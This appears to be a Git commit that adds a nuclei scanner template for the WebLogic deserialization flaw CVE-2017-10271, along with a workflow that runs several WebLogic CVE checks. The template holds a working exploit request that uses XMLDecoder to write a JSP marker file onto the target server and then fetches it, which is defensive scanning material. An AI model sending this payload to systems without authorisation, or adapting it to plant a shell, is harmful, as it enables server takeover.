Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
parent
dd8d680f64
commit
7a21babcd4
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2017-10271
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CVE-2017-10271
|
||||||
|
author: dr_set
|
||||||
|
severity: high
|
||||||
|
description: Takeover of Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
|
||||||
|
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wls-wsat/CoordinatorPortType"
|
||||||
|
headers:
|
||||||
|
Content-Type: text/xml
|
||||||
|
body: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">
|
||||||
|
<soapenv:Header>
|
||||||
|
<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
|
||||||
|
<java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">
|
||||||
|
<object class=\"java.io.PrintWriter\">
|
||||||
|
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test123.jsp</string>
|
||||||
|
<void method=\"println\">
|
||||||
|
<string>
|
||||||
|
<![CDATA[<% out.print(\"test123\"); %>]]>
|
||||||
|
</string>
|
||||||
|
</void>
|
||||||
|
<void method=\"close\"/>
|
||||||
|
</object>
|
||||||
|
</java></java>
|
||||||
|
</work:WorkContext>
|
||||||
|
</soapenv:Header>
|
||||||
|
<soapenv:Body/>
|
||||||
|
</soapenv:Envelope>"
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/bea_wls_internal/test123.jsp"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "test123"
|
|
@ -0,0 +1,15 @@
|
||||||
|
id: weblogic-workflow
|
||||||
|
info:
|
||||||
|
name: WebLogic Security Checks
|
||||||
|
author: dr_set
|
||||||
|
description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
|
||||||
|
- template: technologies/weblogic-detect.yaml
|
||||||
|
|
||||||
|
subtemplates:
|
||||||
|
- template: cves/2017/CVE-2017-10271.yaml
|
||||||
|
- template: cves/2019/CVE-2019-2725.yaml
|
||||||
|
- template: cves/2020/CVE-2020-2551.yaml
|
||||||
|
- template: cves/2020/CVE-2020-14882.yaml
|
Loading…
Reference in New Issue